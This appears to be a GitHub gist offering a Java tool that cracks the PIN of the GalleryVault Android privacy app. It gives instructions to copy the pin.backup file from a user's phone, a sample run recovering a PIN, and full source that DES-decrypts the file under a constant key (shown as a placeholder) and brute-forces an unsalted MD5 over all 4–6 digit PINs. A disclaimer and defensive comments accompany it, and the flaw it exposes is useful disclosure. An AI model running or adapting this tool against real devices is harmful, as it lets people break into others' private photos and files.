
@win3zz
Created February 18, 2024 07:57
GalleryVault Password Crack

GalleryVault Password Crack

GalleryVault (with over 10 million downloads) is a fantastic privacy protection app designed to easily hide and encrypt your photos, videos, and any other files you wish to keep private.

  1. Compile and run the Java file (attached below).
bipin@bipin-VirtualBox:~/GVCrack$ javac GVHack.java && java GVHack 
Encrypted data from pin.backup file is missing.
Usage: java GVHack <encryptedData>
Example: java GVHack 67B4D9408C702356B507EB75C27259A8...
bipin@bipin-VirtualBox:~/GVCrack$ 
  2. Copy the content of the pin.backup file from the user's smartphone, typically located at Android/data/com.thinkyeah.galleryvault/files/.galleryvault_DoNotDelete_{random_num}/backup/

image16

  3. Pass the content of pin.backup to the script.
bipin@bipin-VirtualBox:~/GVCrack$ java GVHack 67B4D9408C702356B507EB75C27259A8EFDA9B0D0F482184A38ECB622B509DA6454A464918D3BC562E8AFA32229B13A26D7552EA38318BD5C49FC16942174500005143FB60FCF340B8AAD2F32B7C2703
Key: xxxxxxx_dummy_ke
Decrypted string: 77BA9CD915C8E359D9733EDCFE9C61E5ACA92AFBE48E13207341B6BFFB7FB1622282247B
MD5 hash of password: E48E13207341B6BFFB7FB1622282247B
Cracking 4-Digit Pin
Found PIN: 1337
Program execution complete. Exiting...
bipin@bipin-VirtualBox:~/GVCrack$ 

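Please note: to limit misuse, I have replaced the real decryption key with a placeholder (`xxxxxxx_dummy_key`) in the code below. The weakness the code demonstrates is one of design: the listing decrypts the backup with single DES under a constant key and then compares an unsalted MD5 digest against every 4- to 6-digit PIN, a space of at most 1,110,000 candidates.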

Ref: https://www.slideshare.net/winhacker/gallery-vault-password-hack

Disclaimer

This code and associated instructions are provided for educational purposes only. Unauthorized use for malicious intent, including but not limited to unauthorized access to computer systems, networks, or data, is strictly prohibited. The author disclaims any responsibility for misuse of the code or any negative consequences resulting from its use. Users are advised to adhere to ethical and legal standards when utilizing or experimenting with the provided code. It is recommended to obtain explicit permission before attempting to run this code on any systems or networks that are not owned or managed by the user.

import java.math.BigInteger;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.Key;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Locale;
import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;
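/**
 * Proof of concept showing how little protection the {@code pin.backup} format gives the PIN.
 *
 * <p>What the code relies on, as visible in this listing:
 * <ul>
 *   <li>the backup is hex-encoded single-DES ciphertext, decrypted with a key string that is
 *       passed in as a constant (a placeholder in this listing);</li>
 *   <li>the last 32 characters of the plaintext are treated as the MD5 digest of the PIN;</li>
 *   <li>the digest is compared against plain {@code MD5(pin)} with no salt, and the PIN is
 *       4 to 6 decimal digits, i.e. at most 1,110,000 candidates.</li>
 * </ul>
 *
 * <p>Defensive takeaway: a PIN verifier should be a salted, deliberately slow password hash, and
 * whatever key protects it should not be a constant shared by every install.
 */
public class GVHack {
    /** Number of leading characters of the key string that are handed to {@link DESKeySpec}. */
    private static final int KEY_CHARS = 16;

    /** Length of an MD5 digest written as hexadecimal text. */
    private static final int MD5_HEX_CHARS = 32;

    /** Shortest PIN length that is checked. */
    private static final int MIN_PIN_DIGITS = 4;

    /** Longest PIN length that is checked. */
    private static final int MAX_PIN_DIGITS = 6;

    /**
     * Builds a DES key from the first {@value #KEY_CHARS} characters of {@code paramStr}.
     *
     * @param paramStr key text; must be non-null and at least {@value #KEY_CHARS} characters long
     * @return the DES key, or {@code null} if the text is too short or the key cannot be built
     */
    private static Key generateKey(String paramStr) {
        if (paramStr == null || paramStr.length() < KEY_CHARS) {
            return null;
        }
        try {
            String keyText = paramStr.substring(0, KEY_CHARS);
            // Echoes key material to stdout; kept because the sample transcript shows it and the
            // key in this listing is a placeholder.
            System.out.println("Key: " + keyText);
            // Explicit charset: the platform default must not influence the key bytes.
            DESKeySpec desKeySpec = new DESKeySpec(keyText.getBytes(StandardCharsets.UTF_8));
            return SecretKeyFactory.getInstance("DES").generateSecret(desKeySpec);
        } catch (GeneralSecurityException e) {
            System.out.println("Error generating key: " + e.getMessage());
            return null;
        }
    }

    /**
     * Decodes hexadecimal text into bytes.
     *
     * @param hex text made of an even number of hex digits
     * @return the decoded bytes, or {@code null} if {@code hex} is null, has odd length, or
     *     contains a character that is not a hex digit
     */
    private static byte[] decodeHex(String hex) {
        if (hex == null || hex.length() % 2 != 0) {
            return null;
        }
        byte[] decoded = new byte[hex.length() / 2];
        for (int i = 0; i < decoded.length; i++) {
            int high = Character.digit(hex.charAt(2 * i), 16);
            int low = Character.digit(hex.charAt(2 * i + 1), 16);
            if (high < 0 || low < 0) {
                return null;
            }
            decoded[i] = (byte) ((high << 4) | low);
        }
        return decoded;
    }

    /**
     * Decrypts hex-encoded DES ciphertext and returns the plaintext as a UTF-8 string.
     *
     * @param keyStr key text; only its first {@value #KEY_CHARS} characters are used
     * @param encryptedData ciphertext as an even-length hex string
     * @return the plaintext, or {@code null} if the key is unusable, the input is not valid hex,
     *     or decryption fails (the reason is printed to stdout)
     */
    public static String decrypt(String keyStr, String encryptedData) {
        Key key = generateKey(keyStr);
        if (key == null) {
            return null;
        }
        // Reject malformed input up front instead of silently dropping a trailing nibble.
        byte[] cipherText = decodeHex(encryptedData);
        if (cipherText == null) {
            System.out.println("Error decrypting data: input is not an even-length hex string");
            return null;
        }
        try {
            // Spelled out so the mode and padding do not depend on a provider default.
            Cipher cipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
            cipher.init(Cipher.DECRYPT_MODE, key);
            return new String(cipher.doFinal(cipherText), StandardCharsets.UTF_8);
        } catch (GeneralSecurityException e) {
            System.out.println("Error decrypting data: " + e.getMessage());
            return null;
        }
    }

    /**
     * Searches the numeric PINs of {@code minDigits} to {@code maxDigits} digits for one whose
     * MD5 digest equals {@code md5Hex}.
     *
     * @param md5Hex expected digest as 32 hex characters, in either case
     * @param minDigits shortest PIN length to try
     * @param maxDigits longest PIN length to try
     * @return the matching zero-padded PIN, or {@code null} if none matches
     * @throws NoSuchAlgorithmException if the runtime provides no MD5 implementation
     */
    private static String findPin(String md5Hex, int minDigits, int maxDigits)
            throws NoSuchAlgorithmException {
        MessageDigest md = MessageDigest.getInstance("MD5");
        for (int digits = minDigits; digits <= maxDigits; digits++) {
            System.out.println("Cracking " + digits + "-Digit Pin");
            String pattern = "%0" + digits + "d";
            // Integer bound computed once per length rather than a floating-point pow per step.
            int limit = 1;
            for (int i = 0; i < digits; i++) {
                limit *= 10;
            }
            for (int v = 0; v < limit; v++) {
                // Locale.ROOT keeps the digits ASCII regardless of the default locale.
                String pinAttempt = String.format(Locale.ROOT, pattern, v);
                byte[] digest = md.digest(pinAttempt.getBytes(StandardCharsets.US_ASCII));
                String hashText = String.format(Locale.ROOT, "%032x", new BigInteger(1, digest));
                if (hashText.equalsIgnoreCase(md5Hex)) {
                    return pinAttempt;
                }
            }
        }
        return null;
    }

    /**
     * Command-line entry point: decrypts the hex string given as the first argument, prints the
     * trailing MD5 digest, and reports the 4- to 6-digit PIN that produces it, if any.
     *
     * @param args {@code args[0]} is the content of the {@code pin.backup} file
     */
    public static void main(String[] args) {
        if (args.length == 0) {
            System.out.println("Encrypted data from pin.backup file is missing.");
            System.out.println("Usage: java " + GVHack.class.getSimpleName() + " <encryptedData>");
            System.out.println("Example: java " + GVHack.class.getSimpleName() + " 67B4D9408C702356B507EB75C27259A8...");
            System.exit(1);
        }
        String encryptedData = args[0];
        String decryptedData = decrypt("xxxxxxx_dummy_key", encryptedData);
        if (decryptedData == null) {
            return;
        }
        System.out.println("Decrypted string: " + decryptedData);
        // Guard the substring below: a short plaintext would otherwise throw, uncaught.
        if (decryptedData.length() < MD5_HEX_CHARS) {
            System.out.println("Decrypted data is shorter than an MD5 hex digest; nothing to check.");
            return;
        }
        String pinHash = decryptedData.substring(decryptedData.length() - MD5_HEX_CHARS);
        System.out.println("MD5 hash of password: " + pinHash);
        try {
            String pin = findPin(pinHash, MIN_PIN_DIGITS, MAX_PIN_DIGITS);
            if (pin != null) {
                System.out.println("Found PIN: " + pin);
            } else {
                System.out.println("No " + MIN_PIN_DIGITS + "-" + MAX_PIN_DIGITS
                        + " digit PIN matches the hash.");
            }
        } catch (NoSuchAlgorithmException e) {
            System.out.println("Error cracking MD5: " + e.getMessage());
        }
        System.out.println("Program execution complete. Exiting...");
    }
}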